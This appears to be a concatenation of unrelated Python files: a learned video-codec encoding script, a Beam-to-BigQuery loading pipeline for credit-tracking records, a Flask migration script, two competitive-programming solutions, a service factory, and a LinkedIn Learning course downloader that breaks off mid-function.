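# hidden_states packs the (c, h) LSTM states of the four recurrent coders:
# MV analysis/synthesis and residual analysis/synthesis (2 tensors each, 8 in total)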
RPM_flag = tf.placeholder(tf.bool, []) # use RPM (=1) or bottleneck (=0)
# motion estimation
with tf.variable_scope("flow_motion"):
motion_tensor, _, _, _, _, _ = motion.optical_flow(Y0_com_tensor, Y1_raw_tensor, batch_size, Height, Width)
# RAE encoder for motion
motion_latent, c_enc_mv_out, h_enc_mv_out = CNN_recurrent.MV_analysis(motion_tensor, num_filters=args.N, out_filters=args.M,
Height=Height, Width=Width,
c_state=c_enc_mv[0], h_state=h_enc_mv[0], act=activation)
# encode the latent of the first P frame by the bottleneck
entropy_bottleneck = tfc.EntropyBottleneck(name='entropy_bottleneck')
string = tf.squeeze(entropy_bottleneck.compress(motion_latent), axis=0)
motion_latent_decom = entropy_bottleneck.decompress(tf.expand_dims(string, 0), [Height//16, Width//16, args.M], channels=args.M)
motion_latent_hat = tf.cond(RPM_flag, lambda: tf.round(motion_latent), lambda: motion_latent_decom)
# RAE decoder for motion
motion_hat, c_dec_mv_out, h_dec_mv_out = CNN_recurrent.MV_synthesis(motion_latent_hat, num_filters=args.N,
Height=Height, Width=Width,
c_state=c_dec_mv[0], h_state=h_dec_mv[0], act=activation)
# Motion Compensation
Y1_warp = tf.contrib.image.dense_image_warp(Y0_com_tensor, motion_hat)
MC_input = tf.concat([motion_hat, Y0_com_tensor, Y1_warp], axis=-1)
Y1_MC = functions.MC_RLVC(MC_input)
# Get residual
Res = Y1_raw_tensor - Y1_MC
# RAE encoder for residual
res_latent, c_enc_res_out, h_enc_res_out = CNN_recurrent.Res_analysis(Res, num_filters=args.N, out_filters=args.M,
Height=Height, Width=Width,
c_state=c_enc_res[0], h_state=h_enc_res[0], act=activation)
# encode the latent of the first P frame by the bottleneck
entropy_bottleneck2 = tfc.EntropyBottleneck(name='entropy_bottleneck_1_1')
string2 = entropy_bottleneck2.compress(res_latent)
string2 = tf.squeeze(string2, axis=0)
res_latent_decom = entropy_bottleneck2.decompress(tf.expand_dims(string2, 0), [Height//16, Width//16, args.M], channels=args.M)
res_latent_hat = tf.cond(RPM_flag, lambda: tf.round(res_latent), lambda: res_latent_decom)
# RAE decoder for residual
res_hat, c_dec_res_out, h_dec_res_out = CNN_recurrent.Res_synthesis(res_latent_hat, num_filters=args.N,
Height=Height, Width=Width,
c_state=c_dec_res[0], h_state=h_dec_res[0], act=activation)
# reconstructed frame
Y1_decoded = tf.clip_by_value(res_hat + Y1_MC, 0, 1)
# output hidden states
hidden_states_out = tf.stack([c_enc_mv_out, h_enc_mv_out,
c_dec_mv_out, h_dec_mv_out,
c_enc_res_out, h_enc_res_out,
c_dec_res_out, h_dec_res_out], axis=0)
# PSNR or MS-SSIM
if args.metric == 'PSNR':
mse = tf.reduce_mean(tf.squared_difference(Y1_decoded, Y1_raw_tensor))
quality_tensor = 10.0*tf.log(1.0/mse)/tf.log(10.0)
elif args.metric == 'MS-SSIM':
quality_tensor = tf.math.reduce_mean(tf.image.ssim_multiscale(Y1_decoded, Y1_raw_tensor, max_val=1))
# load model
saver = tf.train.Saver(max_to_keep=None)
model_path = './model/RAE_' + args.mode + '_' + str(args.l)
saver.restore(sess, save_path=model_path + '/model.ckpt')
# init quality
quality_frame = np.zeros([args.frame])
# encode the first I frame
frame_index = 1
quality = helper.encode_I(args, frame_index, I_level, path, path_com, path_bin)
quality_frame[frame_index - 1] = quality
# encode GOPs
for g in range(GOP_num):
# forward P frames
# load I frame (compressed)
frame_index = g * GOP_size + 1
F0_com = misc.imread(path_com + 'f' + str(frame_index).zfill(3) + '.png')
F0_com = np.expand_dims(F0_com, axis=0)
for f in range(args.f_P):
# load P frame (raw)
frame_index = g * GOP_size + f + 2
F1_raw = misc.imread(path + 'f' + str(frame_index).zfill(3) + '.png')
F1_raw = np.expand_dims(F1_raw, axis=0)
# init hidden states
if f % 6 == 0:
h_state = np.zeros([8, batch_size, Height // 4, Width // 4, args.N], dtype=np.float)
# since the model is optimized on 6 frames, we reset hidden states every 6 P frames
if f == 0:
flag = False
# the first P frame uses bottleneck
else:
flag = True
# run RAE
F0_com, string_MV, string_Res, quality, h_state, latent_mv, latent_res \
= sess.run([Y1_decoded, string, string2, quality_tensor,
hidden_states_out, motion_latent_hat, res_latent_hat],
feed_dict={Y0_com_tensor: F0_com / 255.0, Y1_raw_tensor: F1_raw / 255.0,
hidden_states: h_state, RPM_flag: flag})
F0_com = F0_com * 255
# save bottleneck bitstream
if not flag:
with open(path_bin + '/f' + str(frame_index).zfill(3) + '.bin', "wb") as ff:
ff.write(np.array(len(string_MV), dtype=np.uint16).tobytes())
ff.write(string_MV)
ff.write(string_Res)
# save compressed frame and latents
misc.imsave(path_com + '/f' + str(frame_index).zfill(3) + '.png', np.uint8(np.round(F0_com[0])))
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_mv.npy', latent_mv)
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_res.npy', latent_res)
quality_frame[frame_index - 1] = quality
print('Frame', frame_index, args.metric + ' =', quality)
# encode the next I frame
frame_index = (g + 1) * GOP_size + 1
quality = helper.encode_I(args, frame_index, I_level, path, path_com, path_bin)
quality_frame[frame_index - 1] = quality
# backward P frames
# load I frame (compressed)
F0_com = misc.imread(path_com + 'f' + str(frame_index).zfill(3) + '.png')
F0_com = np.expand_dims(F0_com, axis=0)
for f in range(args.b_P):
# load P frame (raw)
frame_index = (g + 1) * GOP_size - f
F1_raw = misc.imread(path + 'f' + str(frame_index).zfill(3) + '.png')
F1_raw = np.expand_dims(F1_raw, axis=0)
# init hidden states
if f % 6 == 0:
h_state = np.zeros([8, batch_size, Height // 4, Width // 4, args.N], dtype=np.float)
# since the model is optimized on 6 frames, we reset hidden states every 6 P frames
if f == 0:
flag = False
# the first P frame uses bottleneck
else:
flag = True
# run RAE
F0_com, string_MV, string_Res, quality, h_state, latent_mv, latent_res \
= sess.run([Y1_decoded, string, string2, quality_tensor,
hidden_states_out, motion_latent_hat, res_latent_hat],
feed_dict={Y0_com_tensor: F0_com / 255.0, Y1_raw_tensor: F1_raw / 255.0,
hidden_states: h_state, RPM_flag: flag})
F0_com = F0_com * 255
# save bottleneck bitstream
if not flag:
with open(path_bin + '/f' + str(frame_index).zfill(3) + '.bin', "wb") as ff:
ff.write(np.array(len(string_MV), dtype=np.uint16).tobytes())
ff.write(string_MV)
ff.write(string_Res)
# save compressed frame and latents
misc.imsave(path_com + '/f' + str(frame_index).zfill(3) + '.png', np.uint8(np.round(F0_com[0])))
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_mv.npy', latent_mv)
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_res.npy', latent_res)
quality_frame[frame_index - 1] = quality
print('Frame', frame_index, args.metric + ' =', quality)
# encode rest frames
rest_frame_num = args.frame - 1 - GOP_size * GOP_num
# load I frame (compressed)
frame_index = GOP_num * GOP_size + 1
F0_com = misc.imread(path_com + 'f' + str(frame_index).zfill(3) + '.png')
F0_com = np.expand_dims(F0_com, axis=0)
for f in range(rest_frame_num):
# load P frame (raw)
frame_index = GOP_num * GOP_size + f + 2
F1_raw = misc.imread(path + 'f' + str(frame_index).zfill(3) + '.png')
F1_raw = np.expand_dims(F1_raw, axis=0)
# init hidden states
if f % 6 == 0:
h_state = np.zeros([8, batch_size, Height // 4, Width // 4, args.N], dtype=np.float)
# since the model is optimized on 6 frames, we reset hidden states every 6 P frames
if f == 0:
flag = False
# the first P frame uses the bottleneck
else:
flag = True
# run RAE
F0_com, string_MV, string_Res, quality, h_state, latent_mv, latent_res \
= sess.run([Y1_decoded, string, string2, quality_tensor,
hidden_states_out, motion_latent_hat, res_latent_hat],
feed_dict={Y0_com_tensor: F0_com / 255.0, Y1_raw_tensor: F1_raw / 255.0,
hidden_states: h_state, RPM_flag: flag})
F0_com = F0_com * 255
# save bottleneck bitstream
if not flag:
with open(path_bin + '/f' + str(frame_index).zfill(3) + '.bin', "wb") as ff:
ff.write(np.array(len(string_MV), dtype=np.uint16).tobytes())
ff.write(string_MV)
ff.write(string_Res)
# save compressed frame and latents
misc.imsave(path_com + '/f' + str(frame_index).zfill(3) + '.png', np.uint8(np.round(F0_com[0])))
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_mv.npy', latent_mv)
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_res.npy', latent_res)
quality_frame[frame_index - 1] = quality
print('Frame', frame_index, args.metric + ' =', quality)
print('Average ' + args.metric + ':', np.average(quality_frame))
|
#encoding: utf-8
from __future__ import print_function, absolute_import
import logging
import re
import json
import requests
import uuid
import time
import os
import argparse
import datetime
import socket
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.io.filesystems import FileSystems
from apache_beam.metrics import Metrics
from apache_beam.metrics.metric import MetricsFilter
from apache_beam import pvalue
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
TABLE_SCHEMA = (
'idkey:STRING, '
'fecha:STRING, '
'ID:STRING, '
'USER_ID:STRING, '
'LINK:STRING, '
'FECHA_INGRESO_REGISTRO:STRING, '
'HORA_INGRESO_REGISTRO:STRING, '
'VACIO1:STRING, '
'VACIO2:STRING, '
'CEDULA_AGENTE:STRING, '
'CORREO_AGENTE:STRING, '
'PAIS:STRING, '
'CIUDAD:STRING, '
'NOMBRE_AGENTE:STRING, '
'FECHA_CARGUE_B:STRING, '
'FECHA_GESTION:STRING, '
'HORA_GESTION:STRING, '
'TIPIFICACION1:STRING, '
'FECHA_SOLUCION:STRING, '
'HORA_SOLUCION:STRING, '
'OBSERVACIONES:STRING, '
'ALERT1:STRING, '
'TIPIFICACION2:STRING, '
'TIPIFICACION3:STRING, '
'VACIO6:STRING, '
'ESTADO_REGISTRO:STRING, '
'TIPO_GESTION_BASE:STRING, '
'ROL:STRING, '
'FECHA_GESTION2:STRING, '
'TIPO_DE_CREDITO:STRING, '
'PRODUCTO_DE_INTERES:STRING, '
'VACIO3:STRING, '
'VACIO4:STRING, '
'MES_CARGUE:STRING, '
'MES_GESTION:STRING, '
'DATOS_1:STRING, '
'DATOS_2:STRING, '
'DATOS_3:STRING, '
'DATOS_4:STRING, '
'DATOS_5:STRING, '
'ESTADO_PROCESO_VENTA:STRING, '
'DATOS_7:STRING, '
'DATOS_8:STRING, '
'GESTION_CON_LLAMADA:STRING, '
'VACIO7:STRING, '
'VACIO8:STRING, '
'PRIMER_NOMBRE:STRING, '
'SEGUNDO_NOMBRE:STRING, '
'PRIMER_APELLIDO:STRING, '
'SEGUNDO_APELLIDO:STRING, '
'FECHA_DE_NACIMIENTO:STRING, '
'SALARIO:STRING, '
'VALOR_SUBSIDIO:STRING, '
'SUBSIDIOS_RECIBIDOS:STRING, '
'PAC_A_CARGO:STRING, '
'TIPO_DE_EMPLEADOR:STRING, '
'TIPO_NACIONALIDAD:STRING, '
'TIPO_IDENTIFICACION:STRING, '
'NOMBRE_COMPLETO:STRING, '
'SEXO:STRING, '
'GRUO_ESTADO_CIVIL:STRING, '
'DEPTO:STRING, '
'CIUDAD2:STRING, '
'PAIS2:STRING, '
'TIPO_DE_AFILIADO:STRING, '
'GRUPO_DE_AFILIADO:STRING, '
'CATEGORIA_DE_AFILIACION:STRING, '
'RECIBE_SUBSIDIO:STRING, '
'RECIBE_SUBSIDIO2:STRING, '
'EDAD:STRING, '
'ENTRE_0_Y_05_ANOS:STRING, '
'ENTRE_06_Y_10_ANOS:STRING, '
'ENTRE_11_Y_18_ANOS:STRING, '
'ENTRE_19_Y_23_ANOS:STRING, '
'ENTRE_24_Y_25_ANOS:STRING, '
'MAYORES_DE_25_ANOS:STRING, '
'TOTAL_HIJOS:STRING, '
'TIENE_HIJOS:STRING, '
'NIT:STRING, '
'ASESOR_ESPECIALIZADO:STRING, '
'SEGMENTO:STRING, '
'CANAL_ABORDAJE_TELEFONICO:STRING, '
'CHECK_ABORDAJE:STRING, '
'ANTIGUEDAD:STRING, '
'MONTO_SOLICITADO:STRING, '
'PLAZO:STRING, '
'TASA:STRING, '
'LINEA:STRING, '
'SOLICITUD_ULTIMOS_3_MESES:STRING, '
'SOLICITUD_ULTIMOS_6_MESES:STRING, '
'SALDOVENCIDO:STRING, '
'SALDOVIGENTE:STRING, '
'DIASATRASO:STRING, '
'MONTO_DESEMBOLSADO:STRING, '
'PLAZO_1:STRING, '
'TASA_1:STRING, '
'CUOTAS_PENDIENTES:STRING, '
'SALDO_PENDIENTE:STRING, '
'CREDITO_ACTIVO:STRING, '
'LINEA_1:STRING, '
'DESEMBOLSO_ULTIMOS_3_MESES:STRING, '
'DESEMBOLSO_ULTIMOS_6_MESES:STRING, '
'NOMBRE_EMPRESA:STRING, '
'ESTADO:STRING, '
'NOMTIPO:STRING, '
'GRUPO_ACTIVIDAD_ECONOMICA:STRING, '
'TIPO_DE_APORTANTE:STRING, '
'SECTOR:STRING, '
'TAMANO:STRING, '
'DIRECCION_NORMALIZADA:STRING, '
'BARRIO:STRING, '
'UPZ:STRING, '
'LOCALIDAD:STRING, '
'CIUDAD_RESIDENCIA:STRING, '
'DEPTO_RESIDENCIA:STRING, '
'GRUPO_DEPTO:STRING, '
'CELULAR:STRING, '
'EMAIL:STRING, '
'PERMITE_CONTACTO:STRING, '
'TIENE_CELULAR:STRING, '
'TIENE_CORREO:STRING, '
'MADRE:STRING, '
'PADRE:STRING, '
'CONYUGE:STRING, '
'HIJO1:STRING, '
'HIJO2:STRING, '
'HIJO3:STRING, '
'HIJO4:STRING, '
'HIJO5:STRING, '
'D1:STRING, '
'D2:STRING, '
'D3:STRING, '
'D4:STRING, '
'D5:STRING, '
'D6:STRING, '
'D7:STRING, '
'D8:STRING, '
'D9:STRING, '
'D10:STRING '
)
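# Each 'name:TYPE' entry above is expected to match a key emitted by the formatearData DoFn below,
# since WriteToBigQuery maps the dict keys of each element to these column names.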
class formatearData(beam.DoFn):
def __init__(self, mifecha):
super(formatearData, self).__init__()
self.mifecha = mifecha
def process(self, element):
# print(element)
arrayCSV = element.split(';')
tupla= {'idkey' : str(uuid.uuid4()),
'fecha' : self.mifecha,
'ID' : arrayCSV[0],
'USER_ID' : arrayCSV[1],
'LINK' : arrayCSV[2],
'FECHA_INGRESO_REGISTRO' : arrayCSV[3],
'HORA_INGRESO_REGISTRO' : arrayCSV[4],
'VACIO1' : arrayCSV[5],
'VACIO2' : arrayCSV[6],
'CEDULA_AGENTE' : arrayCSV[7],
'CORREO_AGENTE' : arrayCSV[8],
'PAIS' : arrayCSV[9],
'CIUDAD' : arrayCSV[10],
'NOMBRE_AGENTE' : arrayCSV[11],
'FECHA_CARGUE_B' : arrayCSV[12],
'FECHA_GESTION' : arrayCSV[13],
'HORA_GESTION' : arrayCSV[14],
'TIPIFICACION1' : arrayCSV[15],
'FECHA_SOLUCION' : arrayCSV[16],
'HORA_SOLUCION' : arrayCSV[17],
'OBSERVACIONES' : arrayCSV[18],
'ALERT1' : arrayCSV[19],
'TIPIFICACION2' : arrayCSV[20],
'TIPIFICACION3' : arrayCSV[21],
'VACIO6' : arrayCSV[22],
'ESTADO_REGISTRO' : arrayCSV[23],
'TIPO_GESTION_BASE' : arrayCSV[24],
'ROL' : arrayCSV[25],
'FECHA_GESTION2' : arrayCSV[26],
'TIPO_DE_CREDITO' : arrayCSV[27],
'PRODUCTO_DE_INTERES' : arrayCSV[28],
'VACIO3' : arrayCSV[29],
'VACIO4' : arrayCSV[30],
'MES_CARGUE' : arrayCSV[31],
'MES_GESTION' : arrayCSV[32],
'DATOS_1' : arrayCSV[33],
'DATOS_2' : arrayCSV[34],
'DATOS_3' : arrayCSV[35],
'DATOS_4' : arrayCSV[36],
'DATOS_5' : arrayCSV[37],
'ESTADO_PROCESO_VENTA' : arrayCSV[38],
'DATOS_7' : arrayCSV[39],
'DATOS_8' : arrayCSV[40],
'GESTION_CON_LLAMADA' : arrayCSV[41],
'VACIO7' : arrayCSV[42],
'VACIO8' : arrayCSV[43],
'PRIMER_NOMBRE' : arrayCSV[44],
'SEGUNDO_NOMBRE' : arrayCSV[45],
'PRIMER_APELLIDO' : arrayCSV[46],
'SEGUNDO_APELLIDO' : arrayCSV[47],
'FECHA_DE_NACIMIENTO' : arrayCSV[48],
'SALARIO' : arrayCSV[49],
'VALOR_SUBSIDIO' : arrayCSV[50],
'SUBSIDIOS_RECIBIDOS' : arrayCSV[51],
'PAC_A_CARGO' : arrayCSV[52],
'TIPO_DE_EMPLEADOR' : arrayCSV[53],
'TIPO_NACIONALIDAD' : arrayCSV[54],
'TIPO_IDENTIFICACION' : arrayCSV[55],
'NOMBRE_COMPLETO' : arrayCSV[56],
'SEXO' : arrayCSV[57],
'GRUO_ESTADO_CIVIL' : arrayCSV[58],
'DEPTO' : arrayCSV[59],
'CIUDAD2' : arrayCSV[60],
'PAIS2' : arrayCSV[61],
'TIPO_DE_AFILIADO' : arrayCSV[62],
'GRUPO_DE_AFILIADO' : arrayCSV[63],
'CATEGORIA_DE_AFILIACION' : arrayCSV[64],
'RECIBE_SUBSIDIO' : arrayCSV[65],
'RECIBE_SUBSIDIO2' : arrayCSV[66],
'EDAD' : arrayCSV[67],
'ENTRE_0_Y_05_ANOS' : arrayCSV[68],
'ENTRE_06_Y_10_ANOS' : arrayCSV[69],
'ENTRE_11_Y_18_ANOS' : arrayCSV[70],
'ENTRE_19_Y_23_ANOS' : arrayCSV[71],
'ENTRE_24_Y_25_ANOS' : arrayCSV[72],
'MAYORES_DE_25_ANOS' : arrayCSV[73],
'TOTAL_HIJOS' : arrayCSV[74],
'TIENE_HIJOS' : arrayCSV[75],
'NIT' : arrayCSV[76],
'ASESOR_ESPECIALIZADO' : arrayCSV[77],
'SEGMENTO' : arrayCSV[78],
'CANAL_ABORDAJE_TELEFONICO' : arrayCSV[79],
'CHECK_ABORDAJE' : arrayCSV[80],
'ANTIGUEDAD' : arrayCSV[81],
'MONTO_SOLICITADO' : arrayCSV[82],
'PLAZO' : arrayCSV[83],
'TASA' : arrayCSV[84],
'LINEA' : arrayCSV[85],
'SOLICITUD_ULTIMOS_3_MESES' : arrayCSV[86],
'SOLICITUD_ULTIMOS_6_MESES' : arrayCSV[87],
'SALDOVENCIDO' : arrayCSV[88],
'SALDOVIGENTE' : arrayCSV[89],
'DIASATRASO' : arrayCSV[90],
'MONTO_DESEMBOLSADO' : arrayCSV[91],
'PLAZO_1' : arrayCSV[92],
'TASA_1' : arrayCSV[93],
'CUOTAS_PENDIENTES' : arrayCSV[94],
'SALDO_PENDIENTE' : arrayCSV[95],
'CREDITO_ACTIVO' : arrayCSV[96],
'LINEA_1' : arrayCSV[97],
'DESEMBOLSO_ULTIMOS_3_MESES' : arrayCSV[98],
'DESEMBOLSO_ULTIMOS_6_MESES' : arrayCSV[99],
'NOMBRE_EMPRESA' : arrayCSV[100],
'ESTADO' : arrayCSV[101],
'NOMTIPO' : arrayCSV[102],
'GRUPO_ACTIVIDAD_ECONOMICA' : arrayCSV[103],
'TIPO_DE_APORTANTE' : arrayCSV[104],
'SECTOR' : arrayCSV[105],
'TAMANO' : arrayCSV[106],
'DIRECCION_NORMALIZADA' : arrayCSV[107],
'BARRIO' : arrayCSV[108],
'UPZ' : arrayCSV[109],
'LOCALIDAD' : arrayCSV[110],
'CIUDAD_RESIDENCIA' : arrayCSV[111],
'DEPTO_RESIDENCIA' : arrayCSV[112],
'GRUPO_DEPTO' : arrayCSV[113],
'CELULAR' : arrayCSV[114],
'EMAIL' : arrayCSV[115],
'PERMITE_CONTACTO' : arrayCSV[116],
'TIENE_CELULAR' : arrayCSV[117],
'TIENE_CORREO' : arrayCSV[118],
'MADRE' : arrayCSV[119],
'PADRE' : arrayCSV[120],
'CONYUGE' : arrayCSV[121],
'HIJO1' : arrayCSV[122],
'HIJO2' : arrayCSV[123],
'HIJO3' : arrayCSV[124],
'HIJO4' : arrayCSV[125],
'HIJO5' : arrayCSV[126],
'D1' : arrayCSV[127],
'D2' : arrayCSV[128],
'D3' : arrayCSV[129],
'D4' : arrayCSV[130],
'D5' : arrayCSV[131],
'D6' : arrayCSV[132],
'D7' : arrayCSV[133],
'D8' : arrayCSV[134],
'D9' : arrayCSV[135],
'D10' : arrayCSV[136]
}
return [tupla]
def run(archivo, mifecha):
gcs_path = "gs://ct-avon" #Definicion de la raiz del bucket
gcs_project = "contento-bi"
mi_runer = ("DirectRunner", "DataflowRunner")[socket.gethostname()=="contentobi"]
pipeline = beam.Pipeline(runner=mi_runer, argv=[
"--project", gcs_project,
"--staging_location", ("%s/dataflow_files/staging_location" % gcs_path),
"--temp_location", ("%s/dataflow_files/temp" % gcs_path),
"--output", ("%s/dataflow_files/output" % gcs_path),
"--setup_file", "./setup.py",
"--max_num_workers", "5",
"--subnetwork", "https://www.googleapis.com/compute/v1/projects/contento-bi/regions/us-central1/subnetworks/contento-subnet1"
# "--num_workers", "30",
# "--autoscaling_algorithm", "NONE"
])
# lines = pipeline | 'Lectura de Archivo' >> ReadFromText("gs://ct-bancolombia/info-segumiento/BANCOLOMBIA_INF_SEG_20181206 1100.csv", skip_header_lines=1)
#lines = pipeline | 'Lectura de Archivo' >> ReadFromText("gs://ct-bancolombia/info-segumiento/BANCOLOMBIA_INF_SEG_20181129 0800.csv", skip_header_lines=1)
lines = pipeline | 'Lectura de Archivo' >> ReadFromText(archivo, skip_header_lines=1)
transformed = (lines | 'Formatear Data' >> beam.ParDo(formatearData(mifecha)))
# lines | 'Escribir en Archivo' >> WriteToText("archivos/Info_carga_banco_prej_small", file_name_suffix='.csv',shard_name_template='')
# transformed | 'Escribir en Archivo' >> WriteToText("archivos/Info_carga_banco_seg", file_name_suffix='.csv',shard_name_template='')
#transformed | 'Escribir en Archivo' >> WriteToText("gs://ct-bancolombia/info-segumiento/info_carga_banco_seg",file_name_suffix='.csv',shard_name_template='')
transformed | 'Escritura a BigQuery seguimiento_credito' >> beam.io.WriteToBigQuery(
gcs_project + ":cafam.seguimiento_credito",
schema=TABLE_SCHEMA,
create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND
)
# transformed | 'Borrar Archivo' >> FileSystems.delete('gs://ct-avon/prejuridico/AVON_INF_PREJ_20181111.TXT')
# 'Eliminar' >> FileSystems.delete (["archivos/Info_carga_avon.1.txt"])
jobObject = pipeline.run()
# jobID = jobObject.job_id()
return ("Corrio Full HD")
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
from app import app
from app import db
migrate=Migrate(app,db)
manager=Manager(app)
manager.add_command('db',MigrateCommand)
if __name__ == '__main__':
manager.run()
|
#https://codeforces.com/problemset/problem/4/A
n = int(input())
p = 0
q = n
for i in range(1, n):
p = i
q = n - i
#print(p, q)
if q%2==0 and p%2==0:
print('YES')
break
else:
pass
if q%2==0 and p%2==0:
pass
else:
print('NO')
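# Equivalent closed-form check (sketch): a split into two even, positive parts exists
# exactly when n is even and greater than 2:
# print('YES' if n > 2 and n % 2 == 0 else 'NO')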
|
from .people import PeopleService
def create_people_service(people_repository):
return PeopleService(people_repository)
|
# The problem is here:
# https://www.hackerrank.com/challenges/equal
def count(a):
ans = a/5
a = a%5
ans += a/2
a = a%2
ans += a
return ans
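# worked example: count(8) -> one step of 5, one step of 2, one step of 1, i.e. 3 operations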
q = int(raw_input())
for qs in range(q):
n = int(raw_input())
a = map(int, raw_input().strip().split())
minimum = min(a)
for i in range(len(a)):
a[i] -= minimum
ans = [0 for i in range(3)]
for p in range(3):
for i in range(len(a)):
ans[p] += count(a[i])
a[i] += 1
print min(ans)
|
import logging , re, os
from itertools import chain, filterfalse, starmap
from collections import namedtuple
from tqdm import tqdm
BASE_DOWNLOAD_PATH = os.path.join(os.path.dirname(__file__), "downloads")
HEADERS = {
'Content-Type': 'application/json',
'user-agent': 'Mozilla/5.0'
}
session = None
FILE_TYPE_VIDEO = ".mp4"
FILE_TYPE_SUBTITLE = ".srt"
Course = namedtuple("Course", ["name", "slug", "description", "unlocked", "chapters","author"])
Chapter = namedtuple("Chapter", ["name", "videos", "index"])
Video = namedtuple("Video", ["name", "slug", "index", "filename"])
def sub_format_time(ms):
seconds, milliseconds = divmod(ms, 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
    return f'{hours:02}:{minutes:02}:{seconds:02},{milliseconds:03}'
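# e.g. sub_format_time(3723004) -> '01:02:03,004'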
def clean_dir_name(dir_name):
# Remove starting digit and dot (e.g '1. A' -> 'A')
# Remove bad characters (e.g 'A: B' -> 'A B')
no_digit = re.sub(r'^\d+\.', "", dir_name)
no_bad_chars = re.sub(r'[\\:<>"/|?*]', "", no_digit)
return no_bad_chars.strip()
def chapter_dir(course: Course, chapter: Chapter):
folder_name = f"{str(chapter.index).zfill(2)} - {clean_dir_name(chapter.name)}"
if folder_name == '01 - ':folder_name = '01 - Welcome'
chapter_path = os.path.join(BASE_DOWNLOAD_PATH, course.author + " - " + clean_dir_name(course.name), folder_name)
return chapter_path
def build_course(course_element: dict):
author = " ".join(course_element['authors'][0]['slug'].split('-')).title()
chapters = [
Chapter(name=course['title'],
videos=[
Video(name=video['title'],
slug=video['slug'],
index=idx,
filename=f"{str(idx).zfill(2)} - {clean_dir_name(video['title'])}{FILE_TYPE_VIDEO}"
)
for idx, video in enumerate(course['videos'], start=1)
],index=idx)
for idx, course in enumerate(course_element['chapters'], start=1)
]
course = Course(name=course_element['title'],
slug=course_element['slug'],
description=course_element['description'],
unlocked=course_element['fullCourseUnlocked'],
chapters=chapters,
author=author)
logging.info(f'[*] Fetching course {course_element["title"]} Exercise Files')
if course_element.get('exerciseFiles',''):
chapter_path = os.path.join(BASE_DOWNLOAD_PATH, author + " - " + clean_dir_name(course.name), 'Exercise Files')
if not os.path.exists(chapter_path) : os.makedirs(chapter_path)
for exercise in course_element['exerciseFiles']:
file_name = exercise['name']
file_link = exercise['url']
exercise_path = os.path.join(chapter_path,file_name)
exercise_exists = os.path.exists(exercise_path)
logging.info(f'[~] writing course {course_element["title"]} Exercise Files')
if exercise_exists :
logging.info(f'[~] Exercise File {file_name} already Exists')
continue
download_file(file_link,exercise_path)
logging.info(f'[*] Finished writing course {course_element["title"]} Exercise Files')
return course
def fetch_courses(sess,COURSES):
global session
session = sess
for course in COURSES:
if not course:continue
if 'learning/' in course :
splitted = course.split('learning/')[1]
course = splitted.split('/')[0] if '/' in splitted else splitted
fetch_course(course)
def fetch_course(course_slug):
url = f"https://www.linkedin.com/learning-api/detailedCourses??fields=fullCourseUnlocked,releasedOn,exerciseFileUrls,exerciseFiles&" \
f"addParagraphsToTranscript=true&courseSlug={course_slug}&q=slugs"
HEADERS['Csrf-Token'] = session.cookies._cookies['.www.linkedin.com']['/']['JSESSIONID'].value.replace('"','')
resp = session.get(url, headers=HEADERS)
if resp.status_code == 429 :
        logging.info(f'[!] Failed due to: {resp.reason}')
return
data = resp.json()
# data['elements'][0]['exerciseFiles']
course = build_course(data['elements'][0])
logging.info(f'[*] Fetching course {course.name}')
fetch_chapters(course)
logging.info(f'[*] Finished fetching course "{course.name}"')
def fetch_chapters(course: Course):
chapters_dirs = [chapter_dir(course, chapter) for chapter in course.chapters]
# Creating all missing directories
missing_directories = filterfalse(os.path.exists, chapters_dirs)
for d in missing_directories:
os.makedirs(d)
for chapter in course.chapters:
fetch_chapter(course, chapter)
def fetch_chapter(course: Course, chapter: Chapter):
for video in chapter.videos :
fetch_video(course, chapter, video)
def fetch_video(course: Course, chapter: Chapter, video: Video):
subtitles_filename = os.path.splitext(video.filename)[0] + FILE_TYPE_SUBTITLE
video_file_path = os.path.join(chapter_dir(course, chapter), video.filename)
subtitle_file_path = os.path.join(chapter_dir(course, chapter), subtitles_filename)
video_exists = os.path.exists(video_file_path)
subtitle_exists = os.path.exists(subtitle_file_path)
if video_exists and subtitle_exists:
return
logging.info(f"[~] Fetching Chapter no. {chapter.index} Video no. {video.index}")
video_url = f'https://www.linkedin.com/learning-api/detailedCourses?addParagraphsToTranscript=false&courseSlug={course.slug}&q=slugs&resolution=_720&videoSlug={video.slug}'
data = None
tries = 3
for _ in range(tries):
try:
resp = session.get(video_url, headers=HEADERS)
data = resp.json()
resp.raise_for_status()
break
except :
logging.error("[!] This Video is Locked, make sure you have access to linkedin learning via premium account")
try:
video_url = data['elements'][0]['selectedVideo']['url']['progressiveUrl']
except :
logging.error("[!] This Video is Locked, make sure you have access to linkedin learning via premium account")
return
try:
subtitles = data['elements'][0]['selectedVideo']['transcript']
except :
logging.error("[!] Extracting Video subtitles Error")
subtitles = None
duration_in_ms = int(data['elements'][0]['selectedVideo']['durationInSeconds']) * 1000
if not video_exists:
logging.info(f"[~] Writing {video.filename}")
download_file(video_url, video_file_path)
if subtitles is not None:
logging.info(f"[~] Writing {subtitles_filename}")
subtitle_lines = subtitles['lines']
write_subtitles(subtitle_lines, subtitle_file_path, duration_in_ms)
logging.info(f"[~] Done fetching Chapter no. {chapter.index} Video no. {video.index}")
def write_subtitles(subs, output_path, video_duration):
def subs_to_lines(idx, sub):
starts_at = sub['transcriptStartAt']
ends_at = subs[idx]['transcriptStartAt'] if idx < len(subs) else video_duration
caption = sub['caption']
return f"{idx}\n" \
f"{sub_format_time(starts_at)} --> {sub_format_time(ends_at)}\n" \
f"{caption}\n\n"
with open(output_path, 'wb') as f:
for line in starmap(subs_to_lines, enumerate(subs, start=1)):
f.write(line.encode('utf8'))
def download_file(url, output_path):
if url:
try:
r = session.get(url, stream=True)
file_name = os.path.basename(output_path)
file_size = int(r.headers.get('content-length', 0))
initial_pos = 0
r.raise_for_status()
with open(output_path, 'wb') as f:
